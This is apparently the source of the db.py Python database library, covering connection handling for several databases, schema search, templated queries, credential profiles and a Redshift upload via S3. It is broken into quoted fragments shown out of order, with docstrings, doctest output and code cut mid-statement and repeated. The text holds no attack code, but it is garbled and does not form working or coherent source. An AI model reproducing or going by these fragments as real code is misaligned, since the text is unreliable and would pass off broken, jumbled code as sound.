db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0", "u'muppets.yhathq.com', u'password': <PASSWORD>, u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {} user =", "str Your username for the database password: str Your password for the database", "`DB()`. 
None indicates that there will be no limit (That's right, you'll be", "or \"SQL Server\", server=self.hostname or \"localhost\", database=self.dbname or '' ) conn_str = ((self.username", "print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None,", "| NVARCHAR(200) | +-----------+-------------+---------------+ db.find_column(\"*Id\") # returns all columns ending w/ Id +---------------+---------------+---------+", "| | MediaType | MediaTypeId | INTEGER | | Playlist | PlaylistId |", "Invoice | BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\") # returns all columns", "with any metatables (at least ones that fit into our framework), so we're", "tmp_dbpy_foreign_keys(table_name, column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self,", "find boto library. Please ensure it is installed\") if s3 is not None:", "| MediaTypeId | INTEGER | | Track | MediaTypeId | INTEGER | |", "---------- profile: str (optional) identifier/name for your database (i.e. \"dw\", \"prod\") from db", "string to execute data: list, dict Optional argument for handlebars-queries. Data will be", "stored in ~/.db.py_{profile_name} and are a base64 encoded JSON file. This is not", "key query by doing it one time, database-wide, if query is available elif", "sys.stderr.write(\"done!\") def to_dict(self): \"\"\"Dict representation of the database as credentials plus tables dict", "Default number of keys to display in the foreign and reference keys. 
This", "Address +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+ | Customer", "Dawn 0.99 5 Put The Finger On You 0.99 6 Let's Get It", "import StringIO # Python 3.3+ import uuid import re import os import sys", "template and rendered using handlebars. union: bool Whether or not \"UNION ALL\" handlebars", "... Album; ... ''' >>> data = {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q,", "= os.path.expanduser(\"~\") if s3: f = os.path.join(user, S3_PROFILE_ID + name) else: f =", "+ \"\\n\") self._try_command(sql) # generate schema from pandas and then adapt for redshift", "and grab AWS_ACCESS_KEY from your environment variables AWS_SECRET_KEY: str your aws secrety key.", "def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again and looks for", "None) def save_metadata(self, profile=\"default\"): \"\"\"Save the database credentials, plus the database properties to", "self.keys_per_column)) return tables def _try_command(self, cmd): try: self.cur.execute(cmd) except Exception as e: print", "q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables: q = self._query_templates['system']['schema_no_system'] else: q =", "= {\"cols\": [\"AlbumId\", \"Title\", \"ArtistId\"]} >>> len(db.query(q, data=data, union=False)) 347 db.query(q, data=data, union=False)", "NVARCHAR(120) | | MediaType | Name | NVARCHAR(120) | | Playlist | Name", "new table df: DataFrame data frame you want to save to the db", "bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto library.", "f)) os.remove(f) except Exception as e: raise Exception(\"Could not remove profile {0}! Excpetion:", "schema for a column. 
Parameters ----------- search: str glob pattern for what you're", "# returns everything \"\"\" tables = [] for table in self.tables: if glob.fnmatch.fnmatch(table.name,", "Those About To Rock (We Salute You) 1 1 1 2 Balls to", "to include \"system\" tables (the ones that the database needs in order to", "None: raise Exception(\"Must specify AWS_SECRET_KEY as either function argument or as an environment", "one of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache = cache if dbtype", "properties to your db.py profile.\"\"\" if len(self.tables) > 0: f = profile_path(DBPY_PROFILE_ID, profile)", "string. Parameters ---------- q: str Query string to execute data: list, dict Optional", "return Examples -------- >>> from db import DemoDB >>> db = DemoDB() db.query(\"select", "3 4 Restless and Wild 3 2 4 5 Princess of the Dawn", "True except ImportError: try: import pypyodbc as pyo HAS_ODBC = True except ImportError:", "number of records to return in a query. This is used by the", "mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not", "command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False,", "permission on specific buckets can use this feature bucket_name = \"dbpy-{0}\".format(uuid.uuid4()) if s3_bucket:", "len_df, chunk_size) def upload_chunk(i): conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k =", "Wild 3 2 4 5 Princess of the Dawn 3 2 5 6", "name from sqlite_master where type='table';\")] for table in tables: for row in self.cur.execute(\"pragma", "of you probably don't need this, but if you're a db admin you", "+-------------+----------------+--------------+ | Table | Column Name | Type | +-------------+----------------+--------------+ | Customer |", "table_info('{0}')\".format(table)): rows_to_insert.append((table, 
row[1], row[2])) # find for table and column names self.cur.execute(\"drop table", "17 -= Should sort in some way for all those doctests to be", "self._tables = TableSet([Table(self.con, self._query_templates, tables[t][0].schema, t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in", "self.username = username self.password = password self.hostname = hostname self.port = port self.filename", "rows are not in the same order, making doctest fail. db.find_column(\"Name\") # returns", "profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None) if tables: profile['metadata'] = True", "Salute You 6 For Those About To Rock We Salute You 7 For", "statement that will be executed bucket_location: boto.s3.connection.Location a specific AWS location in which", "import pybars from .column import Column, ColumnSet from .table import Table, TableSet from", "find psycopg2 library. Please ensure it is installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname,", "\"limit\": self.limit, \"keys_per_column\": self.keys_per_column, } def find_table(self, search): \"\"\" Aggresively search through your", "open(filename) as fp: q = fp.read() return self.query(q, data=data, union=union, limit=limit) def _create_sqlite_metatable(self):", "ImportError: raise Exception(\"Couldn't find boto library. Please ensure it is installed\") if s3", "return query def query(self, q, data=None, union=True, limit=None): \"\"\" Query your database with", "to the Wall 2 2 <BLANKLINE> GenreId Composer Milliseconds Bytes \\\\\\r 0 1", "| Milliseconds | INTEGER | | Track | GenreId | INTEGER | |", "*much* faster if chunks = multiple-of-slices. Ex: DW1.XL nodes have 2 slices per", "not None: pass else: raise Exception(\"Database type not specified! 
Must select one of:", "self._use_cache = cache if dbtype not in (\"sqlite\", \"mssql\") and username is None:", "= \"\"\" copy {name} from 's3://{bucket_name}/data' credentials 'aws_access_key_id={AWS_ACCESS_KEY};aws_secret_access_key={AWS_SECRET_KEY}' CSV IGNOREHEADER as 1 GZIP;", "creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname') self.dbtype = creds.get('dbtype')", "postgres, sqlite, mysql, mssql, or redshift\") self._use_cache = cache if dbtype not in", "as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY", "from db import DemoDB >>> db = DemoDB() >>> db.find_table(\"A*\") +--------+--------------------------+ | Table", "# Python 2.7 except: from io import StringIO # Python 3.3+ import uuid", "creds.get('password') self.hostname = creds.get('hostname') self.port = creds.get('port') self.filename = creds.get('filename') self.dbname = creds.get('dbname')", "sql.replace(\"[\", \"\").replace(\"]\", \"\") # we'll create the table ONLY if it doens't exist", "**kwargs): \"\"\" Provides an instance of DB that hooks up to the Chinook", "1 For Those About To Rock (We Salute You) 1 1 1 2", "You) 0.99 1 Balls to the Wall 0.99 2 Fast As a Shark", "# find for table and column names self.cur.execute(\"drop table if exists tmp_dbpy_schema;\") self.cur.execute(\"create", "and are a base64 encoded JSON file. This is not to say this", "# perform the \\COPY here. the s3 argument is a prefix, so it'll", "TrackId Name AlbumId MediaTypeId \\\\\\r 0 1 For Those About To Rock (We", "for the DB.\"\"\" if len(self._tables) == 0: self.refresh_schema(self._exclude_system_tables, self._use_cache) return self._tables def __str__(self):", "default port for db. 
portgres: 5432 redshift: 5439 mysql: 3306 sqlite: n/a mssql:", "GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\") # returns all columns containing Address +----------+----------------+--------------+", "and Wild 3 2 4 5 Princess of the Dawn 3 2 5", "performed for col in table['columns']: col_meta.append((col['schema'], col['table'], col['name'], col['type'])) else: sys.stderr.write(\"Refreshing schema. Please", "temporary transfer s3 bucket. This should match your redshift cluster's region. Examples --------", "dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor() elif self.dbtype==\"sqlite\": if not HAS_SQLITE: raise", "conn = S3Connection(AWS_ACCESS_KEY, AWS_SECRET_KEY) chunk = df[i:(i+chunk_size)] k = Key(bucket) k.key = '<KEY>'", "store sensitive data, but it will probably stop your little sister from stealing", "limit=10) Title \\ 0 For Those About To Rock We Salute You 1", "access key. if this is None, the function will try and grab AWS_ACCESS_KEY", "second value in relationship tuple is the table name table_db_ref_keys[rel[1]].append(rel) # generate our", "all tables containing trans >>> results = db.find_table(\"*\") # returns everything \"\"\" tables", "else: return q return query def query(self, q, data=None, union=True, limit=None): \"\"\" Query", "Wild 5 For Those About To Rock We Salute You 6 For Those", "threading.Thread(target=upload_chunk, args=(i, )) t.start() threads.append(t) # join all threads for t in threads:", "str Name of the database schemas: list List of schemas to include. Defaults", "Milliseconds | INTEGER | | Track | GenreId | INTEGER | | Track", "Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure one of them is installed\")", "bool (False) whether you'd like to drop the table if it already exists", "if self.dbtype is None: raise Exception(\"Database type not specified! 
Must select one of:", "sql = pd.io.sql.get_schema(df, name) # defaults to using SQLite format. need to convert", "''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0 For Those About To", "''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10))", "_create_sqlite_metatable(self): \"\"\" SQLite doesn't come with any metatables (at least ones that fit", "| Columns | +--------+--------------------------+ | Album | AlbumId, Title, ArtistId | | Artist", "raw string. Parameters ---------- q: str Query string to execute data: list, dict", "if port is None: if dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port =", "else: raise Exception(\"Database type not specified! Must select one of: postgres, sqlite, mysql,", "{{ . }} ... {{else}} ... {{ . }} , ... {{/if}} ...", "self.con) def query_from_file(self, filename, data=None, union=True, limit=None): \"\"\" Query your database from a", "cluster's region. 
Examples -------- \"\"\" if self.dbtype!=\"redshift\": raise Exception(\"Sorry, feature only available for", "Restless and Wild 3 Restless and Wild 4 Restless and Wild 5 For", "or not to include \"system\" tables (the ones that the database needs in", "data=data, union=False) AlbumId Title ArtistId 0 1 For Those About To Rock We", "HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC = True except ImportError:", "if glob.fnmatch.fnmatch(table.name, search): tables.append(table) return TableSet(tables) def find_column(self, search, data_type=None): \"\"\" Aggresively search", "Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._query_templates = query_templates.get(self.dbtype).queries", "if data: q = self._apply_handlebars(q, data, union) if limit: q = self._assign_limit(q, limit)", "Exception as e: print (\"Error executing command:\") print (\"\\t '{0}'\".format(cmd)) print (\"Exception: {0}\".format(e))", "For Those About To Rock We Salute You 8 For Those About To", "rows_to_insert = [] tables = [row[0] for row in self.cur.execute(\"select name from sqlite_master", "to the Wall 2 Restless and Wild 3 Restless and Wild 4 Restless", "self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur = self.con.cursor()", "import Table, TableSet from .s3 import S3 from .utils import profile_path, load_profile, load_from_json,", "want to return Examples ---------- >>> from db import DemoDB >>> db =", "doctests to be viable... 
-= if not, there's always a random issue where", "if bucket_location is None: bucket_location = Location.DEFAULT except ImportError: raise Exception(\"Couldn't find boto", "from db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\",", "query = \"\\nUNION ALL\".join(query) else: query = \"\\n\".join(query) elif isinstance(data, dict): query =", "8611245 0.99 >>> q = ''' ... SELECT ... a.Title, ... t.Name, ...", "ArtistId 0 1 For Those About To Rock We Salute You 1 1", "(table_name, sql) in self.cur: rgx = \"FOREIGN KEY \\(\\[(.*)\\]\\) REFERENCES \\[(.*)\\] \\(\\[(.*)\\]\\)\" if", "''' ... SELECT ... {{#cols}} ... {{#if @last}} ... {{ . }} ...", "U. D... 252051 4 1 Deaffy & R.A. Smith-Diesel 375418 5 1 <NAME>,", "password: str Your password for the database hostname: str Hostname your database is", "self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\" Pulls your database's schema again", "db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError: pass", "boto.s3.connection.Location a specific AWS location in which to create the temporary transfer s3", "your little sister from stealing your passwords. Parameters ---------- profile: str (optional) identifier/name", "self.dbtype = creds.get('dbtype') self.schemas = creds.get('schemas') self.limit = creds.get('limit') self.keys_per_column = creds.get('keys_per_column') else:", "PlaylistId | INTEGER | | Track | TrackId | INTEGER | | Track", "+ name) try: try: open(f) except: raise Exception(\"Profile '{0}' does not exist. Could", "limit (That's right, you'll be limitless. Bradley Cooper style.) keys_per_column: int, None Default", "find sqlite library. 
Please ensure it is installed\") self.con = sqlite.connect(self.filename) self.cur =", "from db import DemoDB >>> db = DemoDB() db.query(\"select * from Track\").head(2) TrackId", "import psycopg2 as pg HAS_PG = True except ImportError: HAS_PG = False try:", "data, union) if limit: q = self._assign_limit(q, limit) return pd.read_sql(q, self.con) def query_from_file(self,", "self._get_db_metadata(exclude_system_tables, use_cache) tables = self._gen_tables_from_col_tuples(col_meta) # Three modes for refreshing schema # 1.", "| AlbumId | INTEGER | | Track | MediaTypeId | INTEGER | |", "from stealing your passwords. Parameters ---------- profile: str (optional) identifier/name for your database", "of PrettyTable a bit. None means that you'll have verrrrrrrry wide columns in", "tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables =", "pyo.connect(conn_str) self.cur = self.con.cursor() except: self.con = pyo.connect( driver=self.driver or \"SQL Server\", server=self.hostname", "... FROM ... Album a ... INNER JOIN ... Track t ... on", "getattr(self, arg) if arg==\"username\": arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif", "* from Track\", limit=10) TrackId Name AlbumId MediaTypeId \\ 0 1 For Those", "<NAME>, <NAME> 343719 11170334 1 1 None 342562 5510424 <BLANKLINE> UnitPrice 0 0.99", "columns in some cases. driver: str, None Driver for mssql/pyodbc connections. 
Examples --------", "u'port': 5432, u'username': u'kermit'}} \"\"\" profiles = {} user = os.path.expanduser(\"~\") for f", "db import DemoDB >>> db = DemoDB() db.query(\"select * from Track\").head(2) TrackId Name", "the Wall 0.99 2 Fast As a Shark 0.99 3 Restless and Wild", "Artist | ArtistId, Name | +--------+--------------------------+ >>> results = db.find_table(\"tmp*\") # returns all", "all threads for t in threads: t.join() sys.stderr.write(\"done\\n\") if drop_if_exists: sql = \"DROP", "f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables = profile.pop('tables', None)", "from pandas and then adapt for redshift sql = pd.io.sql.get_schema(df, name) # defaults", "your passwords. Parameters ---------- profile: str (optional) identifier/name for your database (i.e. \"dw\",", "data=None, union=True, limit=None): \"\"\" Query your database with a raw string. Parameters ----------", "profile) if f: creds = load_from_json(f) self.username = creds.get('username') self.password = creds.get('password') self.hostname", "| INTEGER | | PlaylistTrack | PlaylistId | INTEGER | | Track |", "single query for getting all key relationships # 3. use the naive approach", "(10000) Number of DataFrame chunks to upload and COPY from S3. Upload speed", "use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys = defaultdict(list) for rel in", "pass try: __import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\")", "try: import pypyodbc as pyo HAS_ODBC = True except ImportError: HAS_ODBC = False", "... {{ . }} , ... {{/if}} ... {{/cols}} ... FROM ... 
Album;", "adapt for redshift sql = pd.io.sql.get_schema(df, name) # defaults to using SQLite format.", "self.con.cursor() self._tables = TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self):", "| INTEGER | | Track | GenreId | INTEGER | | Track |", "with open(filename) as fp: q = fp.read() return self.query(q, data=data, union=union, limit=limit) def", "__import__('imp').find_module('pymysql') db = DB(username=\"root\", hostname=\"localhost\", dbname=\"employees\", dbtype=\"mysql\") db = DB(filename=\"/path/to/mydb.sqlite\", dbtype=\"sqlite\") except ImportError:", "aws access key. if this is None, the function will try and grab", "profile for how you like your queries exclude_system_tables: bool Whether or not to", "self.limit = limit self.keys_per_column = keys_per_column self.driver = driver if self.dbtype is None:", "self.credentials db_dict.update(self.tables.to_dict()) return db_dict def list_profiles(): \"\"\" Lists all of the database profiles", "= DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"prod.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"production\") db = DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\",", "3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]).columns) 17 -= Should sort", "self.dbtype is None: raise Exception(\"Database type not specified! 
Must select one of: postgres,", "Balls to the Wall 2 Restless and Wild 3 Restless and Wild 4", "arg==\"username\": arg = \"user\" elif arg==\"password\": arg = \"<PASSWORD>\" elif arg==\"dbname\": arg =", "= os.path.expanduser(\"~\") for f in os.listdir(user): if f.startswith(\".db.py_\"): profile = load_from_json(os.path.join(user, f)) tables", "= DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\") db = DB(username=\"dev\", hostname=\"localhost\", port=5432, dbname=\"devdb\",", "database's schema for a column. Parameters ----------- search: str glob pattern for what", "\"redshift\", \"sqlite\", \"mysql\"]: if limit: q = q.rstrip().rstrip(\";\") q = \"select * from", "db.save_credentials(profile='test') \"\"\" f = profile_path(DBPY_PROFILE_ID, profile) dump_to_json(f, self.credentials) @staticmethod def load_metadata(profile=\"default\"): f =", "| Invoice | InvoiceId | INTEGER | | Invoice | CustomerId | INTEGER", "of the Dawn 0.99 5 Put The Finger On You 0.99 6 Let's", "SELECT ... '{{ name }}' as table_name, ... COUNT(*) as cnt ... FROM", "self.cur = self.con.cursor() elif self.dbtype==\"mssql\": if not HAS_ODBC and not HAS_PYMSSQL: raise Exception(\"Couldn't", "them is installed\") if HAS_ODBC: base_con = \"Driver={driver};Server={server};Database={database};\".format( driver=self.driver or \"SQL Server\", server=self.hostname", "0.99 >>> template = ''' ... SELECT ... '{{ name }}' as table_name,", "Name | Type | +-----------+-------------+---------------+ | Artist | Name | NVARCHAR(120) | |", "# 2. use a single query for getting all key relationships # 3.", "\"\"\" Provides an instance of DB that hooks up to the Chinook DB", "way to store sensitive data, but it will probably stop your little sister", "INTEGER | | Customer | SupportRepId | INTEGER | | Customer | CustomerId", "{{#if @last}} ... {{ . }} ... {{else}} ... {{ . 
}} ,", "| BillingAddress | NVARCHAR(70) | +----------+----------------+--------------+ db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\", \"INTEGER\"]) # returns all columns", "({q}) q\".format(limit=limit, q=q) return q def _apply_handlebars(self, q, data, union=True): if (sys.version_info <", "def list_profiles(): \"\"\" Lists all of the database profiles available Examples -------- No", "= TableSet([]) self._exclude_system_tables = exclude_system_tables self.handlebars = pybars.Compiler() @property def tables(self): \"\"\"A lazy", "keys_per_column=self.keys_per_column, foreign_keys=table_db_foreign_keys[t], ref_keys=table_db_ref_keys[t]) for t in sorted(tables.keys())]) elif not use_cache: self._tables = TableSet([Table(self.con,", "Big Ones 3 \"\"\" if data: q = self._apply_handlebars(q, data, union) if limit:", "try: import pymssql HAS_PYMSSQL = True except ImportError: HAS_PYMSSQL = False DBPY_PROFILE_ID =", "that are varchars +----------+----------------+--------------+ | Table | Column Name | Type | +----------+----------------+--------------+", "7636561 0.99 7 6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>> q", "Princess of the Dawn 3 2 5 6 Put The Finger On You", "-------- >>> from db import DemoDB >>> db = DemoDB() >>> q =", "Walks 0.99 \"\"\" with open(filename) as fp: q = fp.read() return self.query(q, data=data,", "from .table import Table, TableSet from .s3 import S3 from .utils import profile_path,", "MySQLdb mysql_connect = MySQLdb.connect HAS_MYSQL = True except ImportError: try: import pymysql mysql_connect", "JSON file. This is not to say this a secure way to store", "and reference keys. 
This is used to control the rendering of PrettyTable a", "foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True, use_cache=False): \"\"\"", "\"DB[{dbtype}][{hostname}]:{port} > {user}@{dbname}\".format( dbtype=self.dbtype, hostname=self.hostname, port=self.port, user=self.username, dbname=self.dbname) def __repr__(self): return self.__str__() def", ">>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>> len(db.find_column(\"*Address*\", data_type=\"NVARCHAR(70)\").columns) 3 >>> len(db.find_column(\"*e*\", data_type=[\"NVARCHAR(70)\",", "to all. profile: str Preconfigured database credentials / profile for how you like", "... SELECT ... {{#cols}} ... {{#if @last}} ... {{ . }} ... {{else}}", "Must select one of: postgres, sqlite, mysql, mssql, or redshift\") self._use_cache = cache", "and not HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure one", "to the table name in dict for (table_schema, table_name, column_name, data_type) in cols:", "109 >>> len(db.query_from_file(\"db/tests/myscript.sql\", limit=10)) 10 db.query_from_file(\"db/tests/myscript.sql\", limit=10) Title \\ 0 For Those About", "except ImportError: try: import pymysql mysql_connect = pymysql.connect HAS_MYSQL = True except ImportError:", "t.AlbumId; ... ''' >>> with open(\"db/tests/myscript.sql\", \"w\") as f: ... f.write(q) 109 >>>", "TableSet self._tables = TableSet([Table(self.con, self._query_templates, table_meta[t]['schema'], t, tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t", "import the relevant database libraries # TODO: maybe add warnings? 
try: import psycopg2", "argument or as an environment variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must", "---------- filename: str A SQL script data: list, dict Optional argument for handlebars-queries.", "query_templates.get(self.dbtype).queries if self.dbtype==\"postgres\" or self.dbtype==\"redshift\": if not HAS_PG: raise Exception(\"Couldn't find psycopg2 library.", "| Album | AlbumId | INTEGER | | Album | ArtistId | INTEGER", "relationships # 3. use the naive approach if use_cache: # generate our Tables,", "db = DemoDB() >>> len(db.find_column(\"Name\").columns) 5 >>> len(db.find_column(\"*Id\").columns) 20 >>> len(db.find_column(\"*Address*\").columns) 3 >>>", "str): data_type = [data_type] cols = [] for table in self.tables: for col", "# optimize the foreign/ref key query by doing it one time, database-wide, if", "a raw string. Parameters ---------- q: str Query string to execute data: list,", "= ','.join([repr(schema) for schema in self.schemas]) q = self._query_templates['system']['schema_specified'] % schemas_str elif exclude_system_tables:", "sys.stderr.write(\"Indexing schema. This will take a second...\") rows_to_insert = [] tables = [row[0]", "variable `AWS_ACCESS_KEY`\") if AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as either function", "q = \"select * from ({q}) q limit {limit}\".format(q=q, limit=limit) return q #", "secure way to store sensitive data, but it will probably stop your little", "3 2 4 5 Princess of the Dawn 3 2 5 6 Put", "HAS_PYMSSQL: raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure one of them", "raise Exception(\"Couldn't find pyodbc or pymssql libraries. Please ensure one of them is", "def __delete__(self): del self.cur del self.con def load_credentials(self, profile=\"default\"): \"\"\" Loads crentials for", "TrackId | INTEGER | | Track | AlbumId | INTEGER | | Track", "a.AlbumId = t.AlbumId; ... 
''' >>> len(db.query(q)) 3503 db.query(q, limit=10) Title \\ 0", "cases. driver: str, None Driver for mssql/pyodbc connections. Examples -------- db = DB(dbname=\"AdventureWorks2012\",", "this is None, the function will try and grab AWS_SECRET_KEY from your environment", "bool Whether or not to include \"system\" tables (the ones that the database", "\"\"\" _ROOT = os.path.abspath(os.path.dirname(__file__)) chinook = os.path.join(_ROOT, 'data', 'chinook.sqlite') return DB(filename=chinook, dbtype='sqlite', keys_per_column=keys_per_column,", "str path to sqlite database dbname: str Name of the database schemas: list", "''' ... SELECT ... '{{ name }}' as table_name, ... COUNT(*) as cnt", "except ImportError: HAS_SQLITE = False try: import pyodbc as pyo HAS_ODBC = True", "To Rock (We Salute You) 0.99 1 Balls to the Wall 0.99 2", "`query` method, or by passing an argument to `DB()`. None indicates that there", "Ho... 230619 3 1 <NAME>, <NAME>-Diesel, <NAME>, U. D... 252051 4 1 Deaffy", "to create the temporary transfer s3 bucket. This should match your redshift cluster's", "Employee | ReportsTo | INTEGER | | Employee | EmployeeId | INTEGER |", "_apply_handlebars(self, q, data, union=True): if (sys.version_info < (3, 0)): q = unicode(q) template", "db import DB try: __import__('imp').find_module('psycopg2') db = DB(username=\"kermit\", password=\"<PASSWORD>\", hostname=\"themuppets.com\", port=5432, dbname=\"muppets\", dbtype=\"postgres\")", "tables[t], keys_per_column=self.keys_per_column, foreign_keys=table_meta[t]['foreign_keys']['columns'], ref_keys=table_meta[t]['ref_keys']['columns']) for t in sorted(tables.keys())]) # optimize the foreign/ref key", "MediaTypeId | INTEGER | | Track | GenreId | INTEGER | +---------------+---------------+---------+ db.find_column(\"*Address*\")", "1 1 9 10 Evil Walks 1 1 GenreId Composer Milliseconds \\ 0", "The Venom 0.99 8 Snowballed 0.99 9 Evil Walks 0.99 >>> template =", "relevant database libraries # TODO: maybe add warnings? 
try: import psycopg2 as pg", "metadata table_meta[table['name']] = {k: table[k] for k in ('schema', 'name', 'foreign_keys', 'ref_keys')} #", "elif self.dbtype==\"mysql\": if not HAS_MYSQL: raise Exception(\"Couldn't find MySQLdb or pymysql library. Please", "union=True, limit=None): \"\"\" Query your database from a file. Parameters ---------- filename: str", "dbtype==\"postgres\": port = 5432 elif dbtype==\"redshift\": port = 5439 elif dbtype==\"mysql\": port =", "AWS_SECRET_KEY is None: raise Exception(\"Must specify AWS_SECRET_KEY as either function argument or as", "{0}\".format(e)) self.con.rollback() def to_redshift(self, name, df, drop_if_exists=False, chunk_size=10000, AWS_ACCESS_KEY=None, AWS_SECRET_KEY=None, s3=None, print_sql=False, bucket_location=None,", "# # see http://docs.aws.amazon.com/redshift/latest/dg/t_splitting-data-files.html sys.stderr.write(\"Transfering {0} to s3 in chunks\".format(name)) len_df = len(df)", "glob pattern for what you're looking for data_type: str, list (optional) specify which", "the table name in dict for (table_schema, table_name, column_name, data_type) in cols: if", "7 6852860 0.99 8 6599424 0.99 9 8611245 0.99 >>> q = '''", "each table to the table name in dict for (table_schema, table_name, column_name, data_type)", "dbtype=\"postgres\") db = DB(username=\"fozzybear\", password=\"<PASSWORD>\", hostname=\"ec2.523.24.131\", port=5432, dbname=\"muppets_redshift\", dbtype=\"redshift\") except ImportError: pass try:", "DB(username=\"hank\", password=\"<PASSWORD>\", hostname=\"staging.mardukas.com\", dbname=\"bar\", dbtype=\"mysql\") db.save_credentials(profile=\"staging\") db = DB(profile=\"staging\") >>> from db import", "| MediaType | MediaTypeId | INTEGER | | Track | MediaTypeId | INTEGER", "query is available elif not use_cache and isinstance(self._query_templates.get('system', {}).get('foreign_keys_for_db', None), str): self.cur.execute(self._query_templates['system']['foreign_keys_for_db']) table_db_foreign_keys", 
"the function will try and grab AWS_SECRET_KEY from your environment variables s3: S3", "self.hostname elif hasattr(self, 'port'): hostname = '{0}:{1}'.format(self.hostname, self.port) else: hostname = self.hostname self.con", "self.filename) else: db_filename = None return { \"username\": self.username, \"password\": self.password, \"hostname\": self.hostname,", "Id +---------------+---------------+---------+ | Table | Column Name | Type | +---------------+---------------+---------+ | Album", "= False profiles[f[7:]] = profile return profiles def remove_profile(name, s3=False): \"\"\" Removes a", "is None: raise Exception(\"Must specify AWS_ACCESS_KEY as either function argument or as an", "credentials(self): \"\"\"Dict representation of all credentials for the database.\"\"\" if self.filename: db_filename =", "installed\") self.con = pg.connect(user=self.username, password=self.password, host=self.hostname, port=self.port, dbname=self.dbname) self.con.autocommit = True self.cur =", "= \"<PASSWORD>\" elif arg==\"dbname\": arg = \"db\" elif arg==\"hostname\": arg = \"host\" creds[arg]", "this a secure way to store sensitive data, but it will probably stop", "column_name, foreign_table, foreign_column) values('{0}', '{1}', '{2}', '{3}');\" self.cur.execute(sql_insert.format(*row)) self.con.commit() sys.stderr.write(\"finished!\\n\") def refresh_schema(self, exclude_system_tables=True,", "single data frame. limit: int Number of records to return Examples -------- >>>", ">>> results = db.find_table(\"prod_*\") # returns all tables prefixed w/ prod_ >>> results", "results = db.find_table(\"*Invoice*\") # returns all tables containing trans >>> results = db.find_table(\"*\")", 